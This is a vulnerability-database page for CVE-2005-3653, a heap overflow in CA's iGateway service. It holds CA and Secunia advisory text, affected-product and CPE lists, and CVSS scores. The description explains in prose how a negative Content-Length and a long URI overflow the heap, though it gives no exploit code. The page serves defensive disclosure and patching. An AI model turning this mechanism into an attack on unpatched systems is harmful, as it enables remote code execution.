The versions are affected by this vulnerability if you see a value LESS THAN the following: 4.0.051230 (note the format of v.s.YYMMDD)
References: (note that URLs may wrap) CA SupportConnect: http://supportconnect.ca.com/ http://supportconnectw.ca.com/public/ca_common_docs/igatewaysecurity_not ice.asp
CAID: 33778 CAID Advisory link: http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778
CVE Reference: CVE-2005-3653 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3653
OSVDB Reference: OSVDB-22688 http://osvdb.org/22688
iDefense Reference: Computer Associates iTechnology iGateway Service Content-Length Buffer Overflow http://www.idefense.com/intelligence/vulnerabilities/display.php?id=376
Changelog: v1.0 - Initial Release v1.1 - Removed several unaffected technologies; added more reference links.
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln@ca.com, or contact me directly.
If you discover a vulnerability in CA products, please report your findings to vuln@ca.com, or utilize our "Submit a Vulnerability" form. URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Dir. of CA Vulnerability Research Team
CA, One Computer Associates Plaza. Islandia, NY 11749
Contact http://www3.ca.com/contact/ Legal Notice http://ca.com/calegal.htm Privacy Policy http://www.ca.com/caprivacy.htm Copyright 2006 CA. All rights reserved
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200512-0273",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter application server managment",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "11.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "11.0"
},
{
"model": "etrust directory",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.1_web_components"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "11"
},
{
"model": "unicenter service desk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "unicenter service fulfillment",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "etrust audit irecorder",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.5"
},
{
"model": "unicenter exchange management console",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "unicenter autosys jm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "unicenter web server management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "unicenter asset portfolio management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "itechnology igateway",
"scope": "lte",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0.050615"
},
{
"model": "unicenter service fulfillment",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "brightstor arcserve backup laptops desktops",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "brightstor enterprise backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "10.0"
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "etrust identity minder",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "etrust audit irecorder",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.3"
},
{
"model": "etrust audit aries",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.5"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "brightstor storage resource manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.4"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "unicenter service desk knowledge tools",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "brightstor enterprise backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "10.5"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter service catalog fulfillment accounting",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "unicenter web services distributed management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "brightstor process automation manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust audit aries",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "unicenter ca web services distributed management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11.0"
},
{
"model": "unicenter service metric analysis",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.5"
},
{
"model": "unicenter service delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "brightstor arcserve backup laptops desktops",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.0"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "9.01"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "9.01"
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "unicenter asset portfolio management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.0"
},
{
"model": "etrust identity minder",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "brightstor arcserve backup laptops desktops",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11.0"
},
{
"model": "associates unicenter web server management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service matrix analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service fulfillment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service desk knowledge tools",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter service catalog/fulfillment/accounting",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter mq management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter management for websphere",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter management for weblogic",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter exchange management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter ca web services distributed management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter autosys jm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter asset portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter application server managment",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust integrated threat management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust identity minder",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust audit irecorders",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust audit irecorders sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust audit irecorders sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust audit aries",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust audit aries sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust audit aries sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.5"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.4"
},
{
"model": "associates brightstor srm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.3"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor process automation manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor enterprise backup for windows bit",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6410.5"
},
{
"model": "associates brightstor enterprise backup for tru64",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates brightstor enterprise backup for solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.01"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for laptops and desktops",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
}
],
"sources": [
{
"db": "BID",
"id": "16354"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:brightstor_enterprise_backup:10.5:*:windows_64-bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_portal:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_storage_resource_manager:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_directory:8.1_web_components:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_identity_minder:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_exchange_management_console:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:11.0:*:weblogic:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_service_fulfillment:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_fulfillment:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup_laptops_desktops:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup_laptops_desktops:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_storage_resource_manager:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_audit_aries:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_audit_irecorder:1.5:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_application_performance_monitor:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_application_server_managment:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_portfolio_management:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_service_catalog_fulfillment_accounting:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_delivery:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_web_server_management:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_web_services_distributed_management:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:brightstor_enterprise_backup:10.0:*:solaris:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:brightstor_enterprise_backup:10.5:*:solaris:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:brightstor_enterprise_backup:10.5:*:tru64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_storage_resource_manager:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_storage_resource_manager:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_audit_irecorder:1.5:sp3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_audit_irecorder:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_autosys_jm:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_ca_web_services_distributed_management:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_desk:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_desk_knowledge_tools:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:itechnology_igateway:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.0.050615",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:brightstor_arcserve_backup:11:*:windows:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_process_automation_manager:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_audit_aries:1.5:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_audit_aries:1.5:sp3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_integrated_threat_management:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:11.0:*:websphere:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:3.5:*:websphere_mq:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_service_level_management:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_metric_analysis:11.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3653"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Erika Mendoza",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
],
"trust": 0.6
},
"cve": "CVE-2005-3653",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-14861",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-3653",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200512-713",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-14861",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14861"
},
{
"db": "NVD",
"id": "CVE-2005-3653"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-713"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Heap-based buffer overflow in the iGateway service for various Computer Associates (CA) iTechnology products, in iTechnology iGateway before 4.0.051230, allows remote attackers to execute arbitrary code via an HTTP request with a negative Content-Length field. \nThe attacker can trigger the vulnerability by supplying a negative HTTP Content-Length value and a large URI to the service. \nA successful attack can result in corrupting process memory and the execution of arbitrary code with SYSTEM privileges on Windows platforms. The vendor has reported that this issue triggers only a denial-of-service condition on other platforms. \nProducts containing iGateway 4.0.051230 are vulnerable to this issue. iTechnology is an integrated technology that provides standard Web service interfaces for third-party products. There is a heap overflow vulnerability in iTechnology\u0027s processing of HTTP request headers. iGateway service monitors standard HTTP or SSL communication on port 5250. The service does not properly handle negative HTTP Content-Length fields. iGateway parses the Content-length field value of the HTTP request and uses this value directly in the malloc() heap allocation call, so if a negative value is provided, the heap allocation call will return a small buffer. After the malloc() call, memcpy the provided URI to the allocated buffer and overwrite it to the heap. \n\nTITLE:\nCA Products iGateway Service Content-Length Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA18591\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/18591/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSystem access\n\nWHERE:\n\u003eFrom local network\n\nSOFTWARE:\nBrightStor ARCserve Backup 11.x\nhttp://secunia.com/product/312/\nBrightStor ARCserve Backup 11.x (for Windows)\nhttp://secunia.com/product/3099/\nBrightStor ARCserve Backup 9.x\nhttp://secunia.com/product/313/\nBrightStor ARCserve Backup for Laptops \u0026 Desktops 11.x\nhttp://secunia.com/product/5906/\nBrightStor Enterprise Backup 10.x\nhttp://secunia.com/product/314/\nBrightStor Process Automation Manager 11.x\nhttp://secunia.com/product/5908/\nBrightStor Storage Resource Manager 11.x\nhttp://secunia.com/product/5909/\nBrightStor Storage Resource Manager 6.x\nhttp://secunia.com/product/5910/\nCA Advantage Data Transformer 2.x\nhttp://secunia.com/product/5904/\nCA AllFusion Harvest Change Manager 7.x\nhttp://secunia.com/product/5905/\nCA BrightStor Portal 11.x\nhttp://secunia.com/product/5577/\nCA BrightStor SAN Manager 11.x\nhttp://secunia.com/product/5576/\nCA eTrust Admin 8.x\nhttp://secunia.com/product/5584/\nCA eTrust Audit 1.x\nhttp://secunia.com/product/5911/\nCA eTrust Audit 8.x\nhttp://secunia.com/product/5912/\nCA eTrust Identity Minder 8.x\nhttp://secunia.com/product/5913/\nCA Unicenter Service Fulfillment 2.x\nhttp://secunia.com/product/5942/\neTrust Secure Content Manager (SCM)\nhttp://secunia.com/product/3391/\n\nDESCRIPTION:\nErika Mendoza has reported a vulnerability in various CA products,\nwhich can be exploited by malicious people to compromise a vulnerable\nsystem. \n\nThe vulnerability is caused due to a boundary error in the handling\nof HTTP data in the iGateway component. \n\nSOLUTION:\nUpdate the iGateway component to version 4.0.051230 or later. \nftp://ftp.ca.com/pub/iTech/downloads/\n\nPROVIDED AND/OR DISCOVERED BY:\nErika Mendoza\n\nORIGINAL ADVISORY:\nComputer Associates: \nhttp://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33778\n\niDEFENSE:\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=376\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \nPlease see below for important changes to CAID 33778 (aka CVE-2005-3653;\nOSVDB 22688; X-Force 24269; SecurityTracker Alert ID 1015526). \nChangelog is near end of advisory. \n\nRegards,\nKen Williams\n\n\nTitle: CAID 33778 - CA iGateway Content-Length Buffer Overflow \nVulnerability [v1.1]\n\nCA Vulnerability ID: 33778\n\nCA Advisory Date: 2006-01-23\nUpdated Advisory [v1.1]: 